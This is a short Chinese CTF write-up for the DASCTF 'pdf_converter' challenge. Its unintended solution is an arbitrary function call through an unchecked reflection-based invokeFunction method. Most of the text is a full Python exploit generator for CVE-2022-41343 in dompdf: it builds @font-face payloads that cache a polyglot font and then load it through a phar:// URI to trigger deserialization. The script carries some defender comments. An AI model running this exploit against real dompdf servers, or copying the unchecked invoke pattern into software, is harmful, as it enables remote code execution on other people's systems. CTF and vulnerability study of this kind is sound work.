DasctfSU6月赛

【困难】pdf_converter

非预期解:

/**
 * Invoke the function named by $function through reflection, binding $vars to
 * its parameters with self::bindParams().
 *
 * @param string|\Closure $function function name (or closure) to reflect and call
 * @param array           $vars     values bound to the reflected parameters
 * @return mixed whatever the invoked function returns
 *
 * NOTE(review): neither the function name nor the arguments are checked against
 * an allow-list here. Where either is derived from request input this amounts
 * to an arbitrary function call — which is the unintended solution this
 * writeup describes. Callers must restrict what reaches $function.
 */
public static function invokeFunction($function, $vars = [])
{
    $reflect = new \ReflectionFunction($function);
    $args = self::bindParams($reflect, $vars);

    // Record the reflected signature in the log when debugging is enabled
    self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');

    return $reflect->invokeArgs($args);
}

直接日进去了

预期解:

CVE-2022-41343

当时都搜到了qwq

http://buaq.net/go-129526.html

exp

#!/usr/bin/env python3
import argparse
import hashlib
import base64
import urllib.parse
import os

# @font-face rule whose `%s` is filled with the font's `src:url()` value: a
# data: URI in the first request and a phar:// URI in the second (see
# generate_payloads). This variant is pre-encoded for a form-encoded request
# body — whitespace appears as `+`.
PAYLOAD_TEMPLATE_URL_ENCODED = '''
<style>@font-face+{+font-family:'exploit';+src:url('%s');+font-weight:'normal';+font-style:'normal';}</style>
'''
# The same rule, unencoded, for a raw HTML body. The family name 'exploit' and
# weight 'normal' are what the cached font file name is built from.
PAYLOAD_TEMPLATE = '''
<style>
@font-face {
font-family:'exploit';
src:url('%s');
font-weight:'normal';
font-style:'normal';
}
</style>
'''

def get_args():
    """Parse the command line and return the resulting ``argparse.Namespace``.

    Positional ``file`` is the path to the polyglot file. ``-p/--path`` is the
    base path of the target's vendor directory and defaults to ``/var/www/``.
    """
    usage_note = '''
This script will generate payloads for CVE-2022-41343
'''
    parser = argparse.ArgumentParser(
        prog="generate_payload.py",
        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
        epilog=usage_note,
    )
    parser.add_argument("file", help="Polyglot File")
    parser.add_argument(
        "-p",
        "--path",
        default="/var/www/",
        help="Base path to vendor directory (Default = /var/www/)",
    )
    return parser.parse_args()

def main():
    """Script entry point: check that the input file exists, then print payloads.

    A missing file is reported with a message on stdout rather than an
    exception; the exit status is unchanged either way.
    """
    args = get_args()
    polyglot = args.file.strip()
    vendor_base = args.path.strip()
    if not os.path.exists(polyglot):
        print("ERROR: File doesn't exist.")
        return
    generate_payloads(polyglot, vendor_base)

def generate_payloads(file, path):
    """Print the two CVE-2022-41343 request bodies for *file*, encoded and raw.

    Args:
        file: path to the polyglot file (presumably a font that is also a valid
            phar archive — inferred from the ``.ttf`` name and the ``phar://``
            URI; confirm against the linked writeup).
        path: base directory of the target's ``vendor`` tree, e.g. ``/var/www/``.

    Returns:
        None. The four payload variants are written to stdout.

    Defender's note: the chain prepared here depends on dompdf fetching a
    remote @font-face source, caching it under a predictable name in
    ``lib/fonts``, and then being pointed at that cached copy through the
    ``phar://`` stream wrapper. Disabling remote resource loading in dompdf
    (``isRemoteEnabled``) and running a patched release remove both steps;
    unexpected ``.ttf`` files appearing under ``lib/fonts`` are a detection
    signal.
    """
    with open(file, "rb") as f:
        fc = f.read()
    b64 = base64.b64encode(fc)
    # Request 1 source URI: the whole file inlined as base64 text.
    data_uri_pure = "data:text/plain;base64,%s" % b64.decode()
    # The md5 of the *unencoded* data URI is what the cached font file name is
    # built from below; any change to the URI changes the expected path.
    md5 = hashlib.md5(data_uri_pure.encode()).hexdigest()
    # The base64 part is percent-encoded twice for the form-encoded variant. The
    # reason isn't visible in this script — confirm against how the target
    # decodes its request body.
    data_uri_double_encoded = "data:text/plain;base64,%s" % urllib.parse.quote_plus(urllib.parse.quote_plus(b64.decode()))
    # Request 2 source URI: the cached copy of request 1's font, reached via
    # phar://. 'exploit' and 'normal' match the family/weight in the templates;
    # the trailing '##' is carried over from the published PoC.
    phar_uri = "phar://%s/vendor/dompdf/dompdf/lib/fonts/exploit_normal_%s.ttf##" % (path,md5)
    req1_enc = PAYLOAD_TEMPLATE_URL_ENCODED % data_uri_double_encoded
    req2_enc = PAYLOAD_TEMPLATE_URL_ENCODED % urllib.parse.quote_plus(phar_uri)
    req1_pure = PAYLOAD_TEMPLATE % data_uri_double_encoded
    req2_pure = PAYLOAD_TEMPLATE % phar_uri
    print("====== REQUEST 1 ENCODED =======")
    print(req1_enc)
    print("====== REQUEST 2 ENCODED =======")
    print(req2_enc)
    print("====== REQUEST 1 NOT ENCODED =======")
    print(req1_pure)
    print("====== REQUEST 2 NOT ENCODED =======")
    print(req2_pure)

# Run only when executed directly, not when imported as a module.
if __name__ == "__main__":
    main()

作者

UPON2021

发布于

2023-04-24

更新于

2023-04-24
